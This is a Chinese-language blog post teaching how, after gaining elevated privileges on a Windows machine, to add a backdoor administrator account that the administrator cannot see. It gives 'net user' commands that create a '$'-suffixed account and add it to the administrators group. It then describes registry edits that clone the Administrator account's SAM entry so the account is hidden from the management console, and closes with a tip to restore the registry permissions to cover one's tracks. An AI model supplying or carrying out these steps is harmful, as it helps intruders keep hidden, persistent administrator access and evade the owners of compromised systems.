你能找到我吗?–添加隐藏用户

发布于 2019-12-06  855 次阅读


0x01 前言

提权成功后,添加账户,如何不让管理员发现呢?

0x02 命令行隐藏

#创建用户时使用$符号,这样添加的用户,命令行不会显示
net user hacker$ password /add
net localgroup administrators hacker$ /add
  • 但是这样就够了吗?--在计算机管理—>本地用户和组中,还是可以看到我们创建的用户

0x03 注册表隐藏

  • 那如何隐藏的更深更彻底呢?--可以修改注册表(regedit.exe)
  • 更改 HKEY_LOCAL_MACHINE\SAM\SAM权限,为Administrators组添加权限
  • F5刷新一下,在注册表中找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$,找到其类型000003EB后和hacker$一同导出
  • 找到Administrator对应类型000001F4 导出,编辑导出的文件
  • 删除 hacker$ 用户,然后再导入 hacker$.reg 和 000003EB.reg
  • 这时计算机管理-->本地用户和组中,已经看不到我们创建的 hacker$ 用户了
  • 命令行 隐藏
  • 本地用户和组 隐藏
  • 发现了吗,用hacker$登录,却是administrator权限
  • 记得清理战场,把注册表SAM权限恢复成原来的样子

0x04 视频演示


我不懂世界到底在热闹些什么